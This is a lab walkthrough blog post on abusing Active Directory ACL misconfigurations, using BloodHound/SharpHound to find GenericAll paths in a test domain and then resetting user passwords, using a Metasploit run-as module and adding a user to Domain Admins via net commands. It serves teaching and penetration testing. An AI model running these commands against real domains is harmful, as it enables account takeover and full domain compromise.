Enumerating & Exploiting ACL in Active Directory

Lateral Movement inside Active Directory using BloodHound and SharpHound

Posted by Utkarsh Agrawal on October 09, 2020 · 7 mins read

Hi All,

BloodHound is a great tool for mapping out the objects in Active Directory, it uses JSON files to make Graphs to demonstrate the relationships between the objects in AD. We will see in details below

SharpHound is another great tool for enumerating the Objects and output the results in the JSON file.

We are assuming that we have a Shell, and we are on the Domain which we named ‘adlab.local’.

I have used the PowerView tool, another GREAT tool for enumerating objects in AD.

So before we proceed further, we need to understand the users that we have created for the demonstration.

Victim: This is the target user we have already access on it. This means, that we have a shell on a system that this user has access to.
Victim2: Another user with a little higher privileges as compared to Victim user.
Vulnerablegroup: Group which contains victim2 as a Member.
Suser (Super User): This user is a member of the Domain Admins Group.

BloodHound Introduction

After running SharpHound, and import every JSON file returned by SharpHound in to BloodHound. These are the objects of the ‘adlab.local’ domain graph made by BloodHound, on which we need to focus on.

The most interested groups are Domain Admins, Administrators,
We will see what users are inside of Domain Admins

As you can see ‘suser’ is in the Group, so this will be our interested target, we will make a note of it.

As you know, we have access to the Victim’s account, which is a domain account, and we also find out that there is another account named ‘suser’ which is a Domain Administrator. So let’s find out the path of the misconfiguration if available with the help of BloodHound.

We will give the start node as VICTIM@ADLAB.LOCAL and destination node as SUSER@ADLAB.LOCAL, and check the results.

And yes, we have one, as you can see, the starting node is victim@adlab.local, and the ending node is suser@adlab.local(The one that is not displaying).

So we found an attack path.

Let’s understand this

The victim user is having GenericAll permissions on Victim2 user, which means that we can do reset the password on the victim2 without even knowing the current password. Furthermore, Victim2 is a member of the Vulnerablegroup.

The vulnerablegroup is having GenericAll permission on the last targeted user suser@adlab.local which means, if we can impersonate to victim2 user, we can change the password of the super admin user, and then we can impersonate to superuser and add our user i.e. victim into the Domain Admins Group which is the end goal.

Make sense? Alright, let’s see how we can do it.

Exploit Part

Right now we are a victim user, which is in the domain users group (Less privileged user).

As we know we can change the victim2 password because of GenericAll permission, so let’s change the password.

CMD:- net user victim2 hacked123!@# /DOMAIN

Here we have changed the password but now the challenging part comes here,

How can we impersonate to victim2 User? In other words, How can we use those credentials to become victim2?

Here is what is my opinion

A: Check for RDP accessed Computers, so that we can use the victim2 credentials.
B: Check for any SSH service is open, but it must be connected to the Active Directory domain, otherwise, credentials won’t work in Domain Context (Let me know If I am wrong here).
C: Try runas command.

Here I want to know what other best options can we have? So please if you guys know the best ways to impersonate with domain user credentials please let me know. I really wanted to know the best way to use the credentials.

Note: Psexec won’t work here, because it requires ADMIN$ share access, which our user doesn’t have.
So I pick runas options but when I try to use it, I faced another problem.

CMD: runas /user:victim2 cmd

Here you can not provide the password along with username, it will ask separately like this

But I wasn’t able to submit the password, it just takes me out to the directory without letting me type the password. I don’t know the problem?

So after searching here and there, I come to know that in Metasploit there is a post exploit module for runas command, so I quickly used it, and,,

CMD: run post/windows/manage/run_as_psh user=victim2 pass=hacked123!@# domain=adlab.local

It worked perfectly, now I am a victim2 user. Remember victim2 user was in the Vulnerablegroup, and that group was having GenericAll permissions on SUSER@ADLAB.LOCAL.

Now we can change the password of the suser user, without even knowing the current password.

CMD: net user suser hacked123!@# /domain


Now impersonating to suser in the same way,

And yes!!, we have successfully impersonated to suser. Guess what now, we will add our victim user into the Domain Admins group, because we are now suser which is a Domain Administrator.

CMD: net group "Domain Admins" victim /ADD /DOMAIN

And there we go, we are the administrator of the domain ‘adlab.local’.

Future Work:

My focus will be create more advance vulnerable permissions and show how we can exploit it. In my opinion, finding the misconfiguration is easy, but exploiting it, will be very challenging.

Will continue the series.
Thanks for your time,

Till then, stay safe stay healty

Demo Image